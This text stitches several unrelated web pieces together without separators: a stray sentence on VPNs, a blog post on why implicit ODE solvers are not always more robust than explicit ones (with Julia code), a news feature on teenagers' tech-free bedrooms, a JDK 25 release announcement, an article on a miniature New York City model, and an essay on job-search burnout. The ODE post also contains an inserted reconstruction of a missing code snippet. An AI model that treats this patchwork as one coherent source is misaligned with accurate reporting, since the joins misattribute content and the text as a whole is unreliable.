As governments expand online restrictions, VPN providers are steadily introducing new tactics to help users stay connected.
Implicit ODE Solvers Are Not Universally More Robust Than Explicit ODE Solvers
A very common adage about ODE solvers is that if you run into trouble with an explicit method, usually some explicit Runge-Kutta method like RK4, then you should try an implicit method. Implicit methods, because they do more work (solving an implicit system via a Newton method) and have "better" stability, should be the thing you go to on the "hard" problems.
This is at least what I heard at first, and then I learned about the edge cases. Specifically, you hear people say "but for hyperbolic PDEs you need to use explicit methods". You might even intuit from this "PDEs can have special properties, so sometimes special things can happen with PDEs… but for ODEs, you should use implicit methods if you need more robustness". This turns out not to be true, and really understanding the ODE case will help us understand why some PDE semidiscretizations have this "special cutout".
What I want to do in this blog post is more clearly define what "better stability" actually means, and show that it has certain consequences that can sometimes make explicit ODE solvers more robust on some problems. And not just some made-up problems: lots of real problems that show up in the real world.
A Quick Primer on Linear ODEs
First, let’s go through the logic of why implicit ODE solvers are considered to be more robust, which we want to define in some semi-rigorous way as “having a better chance to give an answer closer to the real answer”. In order to go from semi-rigorous into a rigorous definition, we can choose a test function, and what better test function to use than a linear ODE. So let’s define a linear ODE:
$$u’ = \lambda u$$
is the simplest ODE. We can even solve it analytically, $u(t) = \exp(\lambda t)u(0)$. For completeness, we can generalize this to a linear system of ODEs, where instead of having a scalar $u$ we can let $u$ be a vector, in which case the linear ODE has a matrix of parameters $A$, i.e.
$$u’ = Au$$
In this case, if $A$ is diagonalizable, $A = P^{-1}DP$, then we can replace $A$:
$$u’ = P^{-1}DP u$$
$$Pu’ = DPu$$
or if we let $w = Pu$, then
$$w’ = Dw$$
where $D$ is a diagonal matrix. This means that for every element of $w$ we have the equation:
$$w_i’ = \lambda_i w_i$$
where $w_i$ is the vector in the direction of the $i$th eigenvector of $A$, and $\lambda_i$ is the $i$th eigenvalue of $A$. Thus our simple linear ODE $u’ = \lambda u$ tells us about general linear systems along the eigenvectors. Importantly, since even for real $A$ we can have $\lambda$ be a complex number, i.e. real-valued matrices can have complex eigenvalues, it’s important to allow for $\lambda$ to be complex to understand all possible systems.
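To see this decoupling numerically, here is a minimal Julia sketch (the matrix and initial condition are arbitrary illustrative choices; note that `eigen` returns the eigenvector matrix $V$, which plays the role of $P^{-1}$ in the notation above):

using LinearAlgebra

# Small example matrix chosen purely for illustration; any diagonalizable A works.
A = [-3.0 1.0;
      0.0 -2.0]
vals, V = eigen(A)                 # columns of V are eigenvectors of A

u0 = [1.0, 2.0]
t  = 0.5
w0 = V \ u0                        # transform into the eigenbasis
u_t = V * (exp.(vals .* t) .* w0)  # each component evolves as exp(λ_i t) w_i(0)

u_t ≈ exp(A * t) * u0              # matches the matrix-exponential solution (true)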
But why is this important for any other ODE? Well by the Hartman-Grobman theorem, for any sufficiently nice ODE:
$$u’ = f(u)$$
We can locally approximate the ODE by:
$$u’ = Au$$
where $A = f'(u)$, i.e. $A$ is the linear system defined by the Jacobian local to the point. This effectively says that for any "sufficiently nice" system (i.e. if $f$ isn't some crazy absurd function and has properties like being differentiable), you can understand how things locally move by looking at the approximating linear system, where the right linear approximation is given by the Jacobian. And we know that linear systems generally boil down to just the scalar linear system, so understanding the behavior of a solver on the scalar linear system tells us a lot about how it will do "for small enough h".
Okay, there are lots of unanswered questions, such as what if $A$ is not diagonalizable? What if $f$ is not differentiable? What if the system is very nonlinear so the Jacobian changes very rapidly? But under assumptions that things are nice enough, we can say that if a solver does well on $u’ = \lambda u$ then it is probably some idea of good.
So now we have a metric by which we can analyze ODE solvers: if a solver has good behavior on $u' = \lambda u$, then it is likely to be good in general. So what does it mean to have good behavior on $u' = \lambda u$? One nice property would be to at least be asymptotically correct for the most basic statement, i.e. does it go to zero when it should? If you have $u' = \lambda u$ and $\lambda$ is negative, then the analytical solution $u(t) = \exp(\lambda t)u(0)$ goes to zero as $t$ goes to infinity. So a good question to ask is: for a given numerical method, for what values of $h$ (the time step size) does the numerical method give a solution that goes to zero, and for which $h$ does it get an infinitely incorrect answer?
To understand this, we just take a numerical method and plug in the test equation. So the first thing to look at is Euler’s method. For Euler’s method, we step forward by $h$ by assuming the derivative is constant along the interval, or:
$$u_{n+1} = u_n + hf(u_n)$$
When does this method give a solution that is asymptotically consistent? With a little bit of algebra:
$$u_{n+1} = u_n + h\lambda u_n$$
$$u_{n+1} = (1 + h\lambda) u_n$$
Let $z = h\lambda$, which means
$$u_{n+1} = (1 + z) u_n$$
This is a discrete dynamical system which has the analytical solution:
$$u_n = u_0 (1+z)^{n}$$
Note that if $|1 + z| > 1$, then $(1+z)^n$ keeps growing as $n$ increases, so this goes to infinity, while if $|1 + z| < 1$ it goes to zero. Since $\lambda$ can actually be a complex number, i.e. real-valued matrices can have complex eigenvalues, the analysis is a little bit more complex (pun intended), but it effectively means that if $z$ is in the unit circle shifted to the left in the complex plane by 1, then $u_n \rightarrow 0$. This gives us the definition of the stability region: $G(z)$ is the region for which $u_n \rightarrow 0$, and for explicit Euler it is the shifted unit circle in the complex plane.
This shows a pretty bad property for this method. For any given $\lambda$ with negative real part, there is a maximum $h$ (for real $\lambda$, $h = 2/|\lambda|$) such that for any larger step size we don't just get a bad answer, we can get an infinitely bad answer, i.e. the analytical solution goes to zero but the numerical solution goes to infinity!
So, is there a method that doesn’t have this bad property? In comes the implicit methods. If you run the same analysis with implicit Euler,
$$u_{n+1} = u_n + hf(u_{n+1})$$
$$u_{n+1} = u_n + h\lambda u_{n+1}$$
$$(1-z) u_{n+1} = u_n$$
$$u_{n+1} = \frac{1}{1-z} u_n$$
Then we have almost an “inverse” answer, i.e. $G(z)$ is everything except the unit circle in the complex plane shifted to the right. This means that for any $\lambda$ with negative real part, for any $h$ the implicit Euler method has $u_n \rightarrow 0$, therefore it’s never infinitely wrong.
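A quick numerical check of the two amplification factors makes this concrete (a sketch, with $\lambda$ and the step sizes chosen arbitrarily for illustration):

# Amplification factors on the test equation u' = λu:
#   explicit Euler: u_{n+1} = (1 + hλ) u_n
#   implicit Euler: u_{n+1} = u_n / (1 - hλ)
λ = -100.0
for h in (0.001, 0.019, 0.021, 0.1)   # explicit stability limit is h = 2/|λ| = 0.02
    z = h * λ
    println("h = $h: |1 + z| = $(abs(1 + z)), |1/(1 - z)| = $(abs(1 / (1 - z)))")
end
# |1 + z| crosses 1 at h = 0.02: past that, explicit Euler diverges geometrically,
# while |1/(1 - z)| < 1 for every h > 0, so implicit Euler always decays.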
Therefore it’s just better, QED.
This then generalizes to more advanced methods. For example, the stability region of RK4 (an explicit method) has a maximum $h$, while the stability region of BDF2 (an implicit method) does not. You can even prove it's impossible for any explicit method to have this "good" property, so "implicit methods are better". QED times 2, done deal.
Wait a second, what about that other “wrongness”?
Any attentive student should immediately throw their hand up. "Teacher, given the $G(z)$ you said, you also have that for any $\lambda$ with $\text{Re}(\lambda) > 0$, a large enough $h$ gives $u_n \rightarrow 0$, but in reality the analytical solution has $u(t) \rightarrow \infty$, so implicit Euler is infinitely wrong! And explicit Euler has the correct asymptotic behavior since it goes to infinity!"
That is completely correct! But it can be easy to brush this off with “practical concerns”. If you have a real model which has positive real eigenvalues like that, then it’s just going to explode to infinity. Those kinds of models aren’t really realistic? Energy goes to infinity, angular momentum goes to infinity, the chemical concentration goes to infinity: whatever you’re modeling just goes crazy! If you’re in this scenario, then your model is probably wrong. Or if the model isn’t wrong, the numerical methods aren’t very good anyways. If you analyze the error propagation properties, you’ll see the error of the numerical method also increases exponentially! So this is a case you shouldn’t be modeling anyways.
Seeing this robustness in practice
Therefore if you need a more accurate result, use an implicit method. And you don’t need to go to very difficult models to see this manifest in practice. Take the linear ODE:
$$T’ = 5(300-T)$$
with $T(0) = 310$. This is a simple model of cooling an object with a constant temperature influx. It's easy to analytically solve: you just have an exponential fall in the temperature towards the steady state $T = 300$. But when we solve it with an explicit method at default tolerances, that's not what we see:
using OrdinaryDiffEq

# Simple cooling law: T' = 5(300 - T), relaxing towards the 300-degree steady state
function cooling(du,u,p,t)
    du[1] = 5.0*(300-u[1])
end
u0 = [310.0]
tspan = (0.0,10.0)
prob = ODEProblem(cooling, u0, tspan)
sol = solve(prob, Tsit5())   # Tsit5 is an explicit Runge-Kutta method

using Plots
plot(sol, title="RK Method, Cooling Problem")
savefig("rk_cooling.png")
We see that the explicit method gives oscillations in the solution! Meanwhile, if we take a "robust" implicit method like the BDF method from the classic C library SUNDIALS, we can solve this:
using Sundials
sol = solve(prob, CVODE_BDF())
plot(sol, title="BDF Method, Cooling Problem")
savefig("bdf_cooling.png")
Sure, it's not perfectly accurate, but at least it doesn't give extremely wrong behavior. We can decrease tolerances to make this all go away, but the main point is that the explicit method is just generally "less robust": you have to be more careful, because it can give results that are qualitatively wrong.
This means that "good tools", tools that have a reputation for robustness, should default to just using implicit solvers, because that's going to be better. And you see that in tools like Modelica. For example, the Modelica University's playground and other tools in the space, like OpenModelica and Dymola, default to implicit solvers like DASSL. And you can see they do great on this problem by default!
So QED, that’s the “right thing to do”: if you want to be robust, stick to implicit methods.
But why oscillations?
Hold up a bit… why does the explicit method give oscillations? While we know that’s wrong, it would be good to understand why it gives the qualitatively wrong behavior that it does. It turns out that this falls right out of the definition of the method. If you go back to the definition of explicit Euler on the test problem, i.e.
$$u_{n+1} = u_n + hf(u_n)$$
then substitute in:
$$u_{n+1} = (1 + h\lambda) u_{n}$$
If we think about our stability criterion $G(z)$ another way, its boundary marks exactly the step sizes at which the next $u_{n+1}$ would flip to a negative real part. So the analytical solution is supposed to go to zero, but the "bad" behavior is when we choose a step size $h$ such that extrapolating out with a straight line for a time of $h$ "jumps" over this zero, something that doesn't happen in the analytical solution. But now let's think about what happens in that case. If you jump over zero, then $u_{n+1} < 0$ (think real-valued for now), so the derivative at the next update points in the other direction, i.e. we're still going towards zero, but now approaching it from the negative side. But since $|1 + h\lambda| > 1$, we have that $|u_{n+1}| > |u_n|$, i.e. the magnitude of the solution keeps growing. So you jump from positive to negative, then negative to positive, then positive to negative, with the jumps growing each time. These are the phantom oscillations of the explicit ODE solver!
So what's happening is that the default tolerances of the explicit ODE solver were loose enough that the chosen $h$s were in the range of the phantom-oscillation behavior, and so you just need to cap $h$ below that value, which depends on the real part of the eigenvalue $\lambda$ (you can do the same analysis with complex numbers, but that just adds rotations in the complex plane on top of the real-part oscillation).
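To make the phantom oscillations concrete, here is a small hand-rolled fixed-step explicit Euler sketch on the cooling problem from above (the step sizes are chosen to straddle the cap, which for $\lambda = -5$ is $h = 2/|\lambda| = 0.4$):

# Fixed-step explicit Euler on T' = 5(300 - T), T(0) = 310, where λ = -5.
function euler_cooling(h, nsteps)
    T = 310.0
    history = [T]
    for _ in 1:nsteps
        T += h * 5.0 * (300.0 - T)   # one explicit Euler step
        push!(history, T)
    end
    return history
end

euler_cooling(0.1, 10)   # 1 + hλ = 0.5: smooth monotone decay towards 300
euler_cooling(0.3, 10)   # 1 + hλ = -0.5: jumps over 300, but the oscillations decay
euler_cooling(0.5, 10)   # 1 + hλ = -1.5: past h = 0.4, the oscillations grow without bound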
But if explicit methods give oscillations, what’s going on with implicit ODE solvers with large $h$? Let’s look at the update equation again:
$$u_{n+1} = \frac{1}{1-z} u_n$$
now instead of multiplying each time by $(1+z)$, we divide by $(1-z)$. This means that when $\lambda < 0$ (or $\text{Re}(\lambda) < 0$ to be more exact), then for any $h$ we have that $|u_{n+1}| < |u_n|$. Therefore we might jump over the zero with a big enough $h$, but we are guaranteed that our "jump size" is always shrinking. Thus for any $h$, we will get to zero, because we're always shrinking in absolute value.
This means that implicit methods work because they have a natural dampening effect. This explains in more detail why we saw what we saw: the explicit method, when the error tolerance is loose enough, will introduce oscillations that don't exist, while the implicit method will not have this behavior. This is a more refined version of "energy doesn't go to infinity!"; now it's "energy doesn't come from nowhere in real systems", and because of this implicit solvers give a better qualitative answer. This is why they are more robust, which is why robust software for real engineers just always defaults to them.
Wait a second… do we always want that?
You should now be the student in the front row raising your hand, “implicit methods are always dampening… is that actually a good idea? Are you sure that’s always correct?” And the answer is… well it’s not. And that then gives us exactly the failure case for which implicit methods are less robust. If you have a system that is supposed to actually oscillate, then this “hey let’s always dampen everything to make solving more robust” actually leads to very wrong answers!
To highlight this, let’s just take a simple oscillator. You can think of this as a harmonic oscillator, or you can think about it as a simple model of a planet going around a star. However you want to envision it, you can write it out as a system of ODEs:
$$u_1′ = 500u_2$$
$$u_2′ = -500u_1$$
This is the linear ODE $u’ = Au$ where $A = [0\ 500; -500\ 0]$, which has complex eigenvalues with zero real part. In other words, the analytical solution is $\sin(500t)$ and $\cos(500t)$, just a pure oscillation that just keeps going around and around in circles. If we solve this with an explicit ODE solver:
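(The explicit-solver snippet appears to be missing here; the following is a minimal reconstruction consistent with the surrounding code. The initial condition u0 is an assumed illustrative choice, and the CVODE_BDF call below reuses this prob.)

function oscillator(du,u,p,t)
    du[1] = 500.0 * u[2]     # u1' = 500 u2
    du[2] = -500.0 * u[1]    # u2' = -500 u1
end
u0 = [1.0, 0.0]              # assumed initial condition: the orbit is the unit circle
tspan = (0.0, 10.0)
prob = ODEProblem(oscillator, u0, tspan)
sol = solve(prob, Tsit5())   # explicit Runge-Kutta solve
plot(sol, title="RK Method", idxs=(1,2))
savefig("rk_oscillate.png")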
we can see that it generally gets the right answer. Over time you get some drift where the energy slowly increases due to numerical error in each step, but it goes around in circles relatively well. However, our "robust" implicit method…
sol = solve(prob, CVODE_BDF())
plot(sol, title="BDF Method", idxs=(1,2))
savefig("bdf_oscillate.png")
It says the answer goes to zero! Even when the analytical solution is just a circle! But we can understand why this is the case: the software developers made the implicit assumption that “dampening oscillations is always good, because generally that’s what happens in models, so let’s always do this by default so people get better answers”, and the result of this choice is that if someone puts in a model of the Earth going around the sun, then oops the Earth hits the sun pretty quickly.
Conclusion: ODE solvers make trade-offs, you need to make the right ones for your domain
What about the claim mentioned at the beginning of the article, that "for hyperbolic PDEs you need to use explicit methods"? This isn't a "special behavior" of PDEs; it's simply that in this domain, for example advective models of fluids, you want to conserve fluid as it moves. If you choose an implicit method, it "dampens" the solution, which means that as you integrate you get less and less fluid, breaking the conservation laws and giving qualitatively very incorrect solutions. If you use explicit methods, you don't have this extraneous dampening, and you get a better-looking solution. But you can go even further and develop methods for which, if $h$ is sufficiently small, you get little to no dampening. These are SSP methods, which we say are "for hyperbolic PDEs (conservation laws)" but in reality what we mean is "for when you don't want things to dampen".
But the point is, you can't just say "if you want a better solution, use an implicit solver". Maybe in some domains and for some problems that is true, but in other domains and problems it's not. And many numerical issues can stem from the implicit assumptions that follow from the choice of integrator. Given all of this, it should be no surprise that much of the Modelica community has had many problems handling fluid models; the general flow of "everything is a DAE" → "always use an implicit solver" → "fluid models always dampen" → "we need to fix the dampening" could be fixed by making different assumptions at the solver level.
So, the next time someone tells you that you should just use ode15s or scipy.integrate.radau to make things robust without knowing anything about your problem, say "umm, actually".
Little Extra Details
The article is concluded. But here’s a few points I couldn’t fit into the narrative I want to mention:
Trapezoidal is cool
One piece I didn't fit in here is that the Trapezoidal method is cool. The dampening property comes from L-stability, i.e. $G(z) \rightarrow 0$ as $\text{Re}(z) \rightarrow -\infty$. This is a stricter form of stability: instead of just being stable for any finite $\lambda$, it also enforces that you are stable in the limit of large negative $\lambda$. "Most" implicit solvers used in practice, like implicit Euler, have this property, and you can show the dampening is directly related to it. But you can have an implicit method that isn't L-stable. Adams-Bashforth-Moulton methods, for example, are not even A-stable, so they tend to have weaker stability properties and act more like explicit methods. The Trapezoidal method, though, is A-stable without being L-stable, so it tends not to dampen while still being pretty stable. It's not as stable as implicit Euler, and the difference between "stable for any linear ODE" and "actually stable for nonlinear ODEs" (i.e. B-stability) is pronounced on real-world stiff problems. What this means in human terms is that the Trapezoidal method tends not to be stable enough for hard stiff problems, but it also doesn't artificially dampen, so it can be a good default when you know you have "some stiffness" but also want to keep some oscillations. One particular case of this is some electrical circuit models with natural oscillators.
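As a quick illustration, the stability function of the Trapezoidal method on the test equation is $G(z) = (1 + z/2)/(1 - z/2)$, and sampling it along the negative real axis (points chosen arbitrarily) shows the A-stable-but-not-L-stable behavior described above:

# Stability functions on u' = λu, with z = hλ:
G_trap(z) = (1 + z/2) / (1 - z/2)   # Trapezoidal: A-stable, not L-stable
G_ieuler(z) = 1 / (1 - z)           # Implicit Euler: L-stable

for z in (-1.0, -10.0, -100.0, -1000.0)
    println("z = $z: |G_trap| = $(abs(G_trap(z))), |G_ieuler| = $(abs(G_ieuler(z)))")
end
# As z → -∞, |G_trap(z)| → 1, so the Trapezoidal method barely dampens stiff modes
# (they flip sign each step instead of dying out), while |G_ieuler(z)| → 0.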
Lower order methods have purposes too
"All ODE solvers have a purpose": I give some talks that lay out the justification for many high-order methods, so in general "higher order is good if you solve with stricter tolerances and need more precision". But lower-order methods can be better because higher-order methods require that more derivatives of $f$ are defined, and if that's not the case (like with derivative discontinuities), then lower-order methods will be more efficient. So even implicit Euler has cases where it's better than higher-order BDF methods, and it has to do with "how nice" $f$ is.
BDF methods like DASSL are actually α-stable
I said that generally the implicit methods you use are A-stable. That's also a small lie to make the narrative simpler. The BDF methods which Sundials, DASSL, LSODE, FBDF, etc. use are actually α-stable, which means they are missing some angle α of the complex plane: they are only guaranteed stable within a sector around the negative real axis.
So these BDF methods are actually pretty bad for other reasons on very oscillatory problems! Meanwhile, things like Rosenbrock methods can also solve DAEs while actually being L-stable, which can make them more stable in many situations where there are oscillations towards a steady state. So there's a trade-off there… again, every method has a purpose. But this is another case of "ode15s is more stable than ode23s"… "well, actually…"
Teens turned their rooms into tech-free zones. This was the result
Image caption: Elizabeth can spend up to four hours a night in her room watching YouTube videos
A group of teenagers from Bradford, the 2025 UK City of Culture, agreed to take all technology out of their bedrooms for five days to see how they would cope.
We followed two of them, Elizabeth and Henry, to capture the highs and lows - and to see how long they lasted before giving in to temptation.
Thirteen-year-old Elizabeth says she rarely spends time with her parents after school.
The self-confessed Sabrina Carpenter fan normally heads straight to her bedroom for "three or four hours" to watch YouTube videos of her pop idol and chat to her friends.
"My bedroom is basically my peace place," she says.
But she is one of four teenagers at her secondary school to sign up to a tech-free bedroom challenge.
The annual event explores issues affecting teenagers, from smartphones to social media and knife crime to misinformation.
The teenagers will still be able to use their tech, including phones, tablets and laptops - but only in the communal areas of the house.
"It's going to be hard," says Elizabeth. "I'm someone who likes to be in my room."
Elizabeth's dad, Robin, thinks she will "crack before the end of the week" and take her phone into her bedroom.
"That's going to be a challenge for her," he says as Elizabeth starts to laugh.
He's so confident, in fact, that he's made a bet with his daughter.
"If she cracks, Dad gets a big bag of wine gums."
Image caption: Elizabeth (centre) made a bet with her parents that she would be able to last five full days without any technology in her bedroom
Other students at Elizabeth's West Yorkshire school are also taking part in the project, including 15-year-old Eliza, who says the lack of private space to talk to friends is on her mind.
"I plan on making it as inconvenient as possible for [my family]," she says, describing her plan to spend time in shared family spaces, such as "on the stairs" and "on the sofa, but where they want to sit".
Michelle, 15, plans to "read a book to fall asleep", instead of staying up on her phone and laptop.
She says usually a normal night's sleep can be as little as "five hours, max".
Henry, 13, spends most of his time at home gaming with his friends online until nine or 10 at night.
However "the latest I've stayed up is probably about 2am," he says sheepishly.
"There's sometimes where I'll be gaming that I forget to even drink water."
Media caption: Watch: 'I've signed up to give up all my tech in my bedroom'
In July, new rules come into force as part of the Online Safety Act to try and make the internet safer for young people.
Children's commissioner Dame Rachel de Souza says while these changes are "welcome and long overdue", parents should set boundaries for their children by "introducing phone-free time or unplugging before bed to promote better rest and wellbeing".
One in 10 boys spends more than 20 hours a week in their room away from their family.
Henry stored his PlayStation in a cupboard at the start of the week to try and avoid temptation, but it only stayed there for "about two hours" before being put into the living room.
It's a space where his mum, Alyson, often spends her evenings too, with Henry having to remind his friends to not swear when they're speaking on their headsets.
Although he says it means he can't "speak as freely" with his friends, Alyson says it has helped to "open up the conversation" between the pair.
It has also made her realise how much of Henry's friendships are built around online gaming.
"That's the biggest part. It's not really about playing the games, it's the social aspect."
He says another bonus of leaving his tech outside his bedroom at night has meant he hasn't got caught up watching "billions of videos" on TikTok just before he goes to sleep.
Henry says he is already sleeping much better, which in turn has "helped in school… in all subjects and all aspects".
'Teens still need lots of sleep'
Image caption: Henry usually spends several hours a day in his bedroom gaming with his friends online
Improved sleep quality is something Dr Kaitlyn Regehr, associate professor in digital humanities at University College London, says she would expect the teens to experience after removing digital devices from their rooms.
"There are increasing reports of teens feeling tired during the school day because of their smartphone usage," she says.
She adds that teens "still need lots of sleep", which can be disrupted by overnight notifications or late-night exposure to blue light through smartphone screens.
Reflecting on Henry and Elizabeth's gaming, Dr Regehr says basic safety checks parents can do include checking if a teen knows exactly who it is they are gaming with, not having geo-locators turned on, and making sure the themes within the game are age-appropriate.
Image caption: The teenagers were given analogue alarm clocks throughout the week-long experiment
By Wednesday, Elizabeth says she has found other unexpected benefits and has spent her evenings researching ballet lessons and baking chocolate chip bread "out of boredom".
"If I still had my tech, I would have procrastinated baking [until] next week," she says.
Her parents, Robin and Grace, say they've also noticed a change, with Elizabeth choosing to watch documentaries on the family TV rather than online videos in her room.
"[The project has] given her an idea that there's other things to do besides going on your mobile phone and your computer," says Robin.
'A lot better than sitting at home'
As the project comes to an end, the four teenagers swap stories of their tech-free week.
Michelle says she almost gave up on the challenge multiple times as she would like "some peace and quiet", while Eliza says being in a "really bad mood" with her family meant she went to the cinema with her friends.
"It was really fun actually… a lot better than sitting at home," she says.
"I wouldn't normally do that stuff, mainly opting to stay on my phone after school."
But what about the book Michelle planned to read through the week?
"I think I read one chapter, that's it," she says, adding "the reality is it's not going to happen".
Screen time isn't monitored by a quarter of parents
In a survey of 2,224 13 to 18-year-olds, conducted for BBC Radio 5 Live and BBC Bitesize, young people were asked about various aspects of life - including their smartphone habits, gaming and screen time.
More than a third (38%) of teenagers said they spent five or more hours on their phones on an average day.
39% would consider taking tech and screens out of their bedrooms to reduce time spent on their devices
Other ways to minimise time on their devices include using in-built settings such as screen time caps (59%) or scheduling regular screen time breaks (66%)
25% say their parents set clear limits on how much time they spend on tech, gaming or social media, while 47% say their parents sometimes set limits
However, more than a quarter (27%) say their parents don't set any limits
Back at home, Henry gleefully rips the 'tech free zone' sign off his bedroom door and instantly moves his PlayStation back onto his desk, but he says he will continue with some new habits he has picked up throughout the week.
"I'll keep my phone outside my bedroom at night because that has helped so much with my sleep."
Elizabeth's dad Robin is similarly impressed with his daughter's resilience - but it does mean he lost his bet.
"A deal's a deal," he says as he hands over two packets of sweets. "Well done."
The BBC asked social media and technology companies for the measures they put in place to help young users limit their screen time.
TikTok says that parents can set screen time limits and block their children from using the app at certain times using its Family Pairing tool. Also, if a user aged under 16 is using TikTok after 10pm, it prompts a 'wind down' feature with a full-screen reminder.
Snapchat pointed us to their UK parent guide in which it suggests that parents set screen time guidelines with their children.
Instagram parent company Meta says that they have introduced 'Instagram Teen Accounts' which switch to sleep mode after 10pm and remind users to leave the app after 60 minutes. There are also parental supervision tools on Instagram, Facebook and Messenger.
YouTube says it has "robust" parental controls and has recently made its Take a Break and Bedtime reminders more prominent.
JDK 25, the reference implementation of Java 25, is now Generally
Available. We shipped build 36 as the second Release Candidate of
JDK 25 on 15 August, and no P1 bugs have been reported since then.
Build 36 is therefore now the GA build, ready for production use.
GPL-licensed OpenJDK builds from Oracle are available here:
https://jdk.java.net/25
Builds from other vendors will no doubt be available soon.
This release includes eighteen JEPs [1]:
470: PEM Encodings of Cryptographic Objects (Preview)
502: Stable Values (Preview)
503: Remove the 32-bit x86 Port
505: Structured Concurrency (Fifth Preview)
506: Scoped Values
507: Primitive Types in Patterns, instanceof, and switch (Third Preview)
508: Vector API (Tenth Incubator)
509: JFR CPU-Time Profiling (Experimental)
510: Key Derivation Function API
511: Module Import Declarations
512: Compact Source Files and Instance Main Methods
513: Flexible Constructor Bodies
514: Ahead-of-Time Command-Line Ergonomics
515: Ahead-of-Time Method Profiling
518: JFR Cooperative Sampling
519: Compact Object Headers
520: JFR Method Timing & Tracing
521: Generational Shenandoah
This release also includes, as usual, hundreds of smaller enhancements
and thousands of bug fixes.
Thanks to everyone who contributed to this release, whether by designing
and implementing features or enhancements, by fixing bugs, or by testing
the early-access builds!
- Mark
[1] https://openjdk.org/projects/jdk/25/
Reno may be “the biggest little city in the world,” but it's got some serious competition from the miniature New York City that hobbyist Joseph Macken built in his upstate New York basement over two decades.
“I sat down in my basement, turned the camera on on my phone and just started talking about my first section, which was Downtown Manhattan,” the Clifton Park resident said on a recent Thursday about his viral TikToks on his roughly 50-by-30-foot scale model of the city. “It just took off.”
The intricate model features what Macken says are hundreds of thousands of buildings, landmarks and geographic elements across the five boroughs and their surroundings, including bridges, airports, the Hudson and East rivers, New York Harbor, Central Park, One World Trade Center and the original World Trade Center, the Statue of Liberty and Empire State Building. The work consists of 350 handmade sections that are pieced together and can be taken apart and moved.
Macken’s videos, which he began posting on TikTok this spring at his children’s urging, have garnered well over 20 million views and widespread praise in recent months. In them, he discusses his creative process and takes viewers on helicopter-like tours of his hometown.
A close up of Macken's model Manhattan (Credit: Joseph Macken)
“We’re about maybe 2,000 feet off the ground, looking down on all the houses and all the neighborhoods,” he says in a video posted earlier this week.
“This is genuinely unreal,” one commenter responded.
“Don't sell it for under $10 million,” another noted.
“A museum needs to display this ASAP,” YouTube’s official account commented on one of Macken’s clips in July.
Macken, a 63-year-old truck driver who grew up in Middle Village and has no formal carpentry or engineering training, said he dreamed of replicating the Queens Museum’s famous “Panorama” after an elementary school trip when he was a kid. He embarked on the endeavor in 2004, armed with little more than balsa wood, Elmer’s glue and Styrofoam. His first building was “the RCA building at Rockefeller Center,” he said, referring to 30 Rock, which was formerly named for its longtime tenant, the Radio Corporation of America.
Macken said it took him about 10 years to build Manhattan alone and 11 years for the rest of the boroughs. He completed his opus in April, and said he’s confident every building in the city is represented. (Gothamist could not independently verify this claim; the city has more than 1 million buildings, according to the Department of Buildings.)
A residential complex and surrounding buildings in Macken's mini NYC (Credit: Joseph Macken)
“I jumped outta my chair and I cheered,” Macken said of the moment he finished the last building, a house on Staten Island.
The project had outgrown Macken’s basement, but he’d built it so it could be broken down into panels and taken to a storage unit. He said it would have stayed there and collected dust if his kids had not encouraged him to get on TikTok and start sharing videos of the model.
Then, in early August, someone he delivered to on his truck route suggested he set up the model at a local event they were sponsoring. So Macken’s mini New York went up at the Cobleskill Fairgrounds near Albany, and can be seen there through Friday. It’s the first public display of the completed work.
Macken with his model Manhattan laid out (Credit: Joseph Macken)
Macken is now working on a mini Minneapolis: “‘Mary Tyler Moore’ was one of my favorite shows growing up,” he said, adding that he plans to eventually do Los Angeles, Las Vegas and Chicago as well.
Some fans said they drove from as far as Baltimore to see the mini NYC in person.
“Pictures do not do justice. This was a masterpiece to witness in person today and well worth the three-and-a-half-hour drive,” one TikTok user commented.
Macken said he’s still figuring out what he’ll do next with the model, but he’s in talks with the Museum of the City of New York in Manhattan about an exhibit there. A museum spokesperson confirmed this, praising his “ingenuity, creativity and skill.”
“I don't wanna put it back in storage,” Macken said. “That's for damn sure.”
I have the good fortune to have a job right now, but many of my friends are out of work. Most have been searching for a while. Some are encountering a problem that has my full sympathy, something I’ve experienced myself at various times. I’m not sure I can solve it, but maybe I can help put words to what some are going through.
The problem unfolds in three distinct phases as the job search drags on.
Phase I: The Obvious but Impossible Search
You’ve spent several months sending out scores of carefully tailored resumes and cover letters for jobs you know you are fully qualified for and would excel at. Usually you get no response. Occasionally you get a polite “position filled.” That’s it.
You’re knocking on all the obvious doors—all the jobs closest to what you’ve been doing—and nothing is opening up. It’s exhausting and frustrating. The very act of telling your friends you’re “discouraged” feels like swallowing a horse pill; “discouraged” does not reach the depths of your fear and despair.
The obvious path forward—finding a job in line with your resume—no longer looks like a path. It looks like The Cliffs of Insanity. What used to feel like the Obvious Way Forward now feels like the Impossible Way Forward. Somewhere in your brain there is a tank of gasoline that gets burned each time you force yourself to do something irksome. That tank has burned down to vapors.
You are burned out. You are burned out on search. You are burned out on an impossible search.
But you can’t stay still. So your mind looks for new paths.
Phase II: The Adjacent-to-Impossible Search
You consider job openings that aren’t quite aligned with what you were doing but might offer better chances. Maybe it’s in an adjacent industry, a slightly different role, or somewhere you never really wanted to live. Maybe you could take a small pay cut. Maybe an hour’s commute wouldn’t be so bad. You expand your search away from the impossible to a broader horizon, to things that are adjacent to impossible.
This often works! The compromises can turn out better than expected. A pay cut can lead to a quick raise that puts you ahead of your prior pay. Sometimes they turn out worse than expected, but the next job search goes better—new connections, new head space, more time for the market to improve.
Sometimes it doesn’t work. The employers don’t bite. The required compromises are just too dire. The adjacent-to-impossible jobs turn out to be impossible too.
You are burned out. You are very burned out. The creativity and spunk it took to expand your horizons has gone nowhere. That extra spark has died. The brain’s reserve gas tank is now showing “E.” You are suffering from a disease we call Adjacent-to-Impossible Search Burnout (AISB, for the medical professionals in the room).
But you can’t stay still. So your mind looks for new paths.
Phase III: Weird Search
Well, if none of the obvious or even next-to-obvious stuff is working, why hang around? Throw the gates wide open, go ronin, walk the whole horizon, drag the whole ocean. You could learn to make jewelry and open an Etsy shop. You could band together with friends and make that little app you’ve always talked about. You could open up that little coffee shop, that bakery, that catering business. You could go back to college and learn a new career.
It feels like giving up, though, doesn’t it? Wait, no! It feels like taking charge of your own destiny, plotting your own course, becoming master of your fate, all that sort of thing! Except, geez, at maybe one-half, one-fourth the pay, if you’re lucky? Maybe less, if you’re paying for college before you even start this new career.
And yet… what’s the alternative? Getting paid zero for the foreseeable future? Continuing to churn out groveling resumes and “I can’t wait to work at your wonderful company that doesn’t have the internal culture of decency or self-discipline to bother responding to this application that you invited, from someone you know really needs answers right now” cover letters?
So yes, you go weird, at least mentally, and you entertain ideas about what else in tarnation might possibly pay you a living wage while using your talents and filling up your joy-meter.
